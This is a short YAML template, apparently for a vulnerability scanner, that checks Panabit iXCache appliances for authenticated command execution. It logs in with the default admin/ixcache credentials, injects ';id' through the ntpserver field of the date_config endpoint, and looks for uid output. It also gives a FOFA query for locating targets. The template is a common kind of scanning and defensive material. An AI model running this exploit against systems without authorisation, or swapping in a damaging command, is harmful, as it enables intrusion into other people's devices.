id: panabit-ixcache-dateconfig-rce

info:
  name: Panabit iXCache date_config 后台命令执行
  author: zan8in
  severity: critical
  verified: true
  description: |
    FOFA: title="iXCache"
  reference:
    - https://mp.weixin.qq.com/s/1sZc6YOrca3TiR1IX4fkiw
  tags: panabit,ixcache,rce
  created: 2023/07/31

rules:
  r0:
    request:
      method: POST
      path: /login/userverify.cgi
      body: username=admin&password=ixcache
    expression: response.status == 200 && response.body.bcontains(b"URL=/cgi-bin/monitor.cgi")
    output:
      search: '"Set-Cookie: (?P<cookie>.+)".bsubmatch(response.raw_header)'
      cookie: search["cookie"]
  r1:
    request:
      method: POST
      path: /cgi-bin/Maintain/date_config
      headers:
        Cookie: "{{cookie}}"
      body: ntpserver=0.0.0.0;id&year=2021&month=08&day=14&hour=17&minute=04&second=50&tz=Asiz&bcy=Shanghai&ifname=fxp1
    expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0() && r1()

